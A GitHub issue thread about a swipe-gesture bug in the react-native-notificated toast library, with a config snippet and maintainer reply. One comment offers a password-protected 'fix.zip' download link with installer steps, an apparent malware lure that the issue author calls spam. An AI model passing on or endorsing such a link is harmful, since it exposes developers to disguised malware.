### ISSUE TITLE
[BUG] Toast container is jumping when swiping

### ISSUE THREAD

**Issue by vlanemcev** [TheWidlarzGroup/react-native-notificated#276]
**Prerequisites**
Please answer the following questions for yourself before submitting an issue.

- [Yes] I am running the latest version
- [Yes] I checked the documentation and found no answer
- [Yes] I checked to make sure that this issue has not already been filed

**Describe the bug**
When I try to swipe toast in direction that I choose - the Toast come back in the initial position and start animation from it. 
Check attached video. 

**To Reproduce**
Here's my config that I use in the screen:

```ts
  useEffect(() => {
    notify("error", {
      params: {
        title: "Test error message",
      },
      config: {
        duration: 1500,
        animationConfig: MoveUp,
        notificationPosition: "top",
        gestureConfig: {
          direction: "y",
          activationDistances: 30,
        },
      },
    });
  }, [notify]);
```

**Expected behavior**
Toast will not jump in initial position and continue it's animation from the end of gesture. 

**Screenshots**

https://github.com/user-attachments/assets/d47ae93a-3111-456a-bb1b-e7bac1bc9e38

**Smartphone:**
 - Simulator: IPhone 15 Pro

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vlanemcev** [comment]
@PdoubleU Looks like comment above is spam.

**Comment by PdoubleU** [comment]
@vlanemcev thanks for opening the issue, this is something should be improved. Feel free to open PR with the fix ⚙️. I'd be happy to review and merge it ❤️
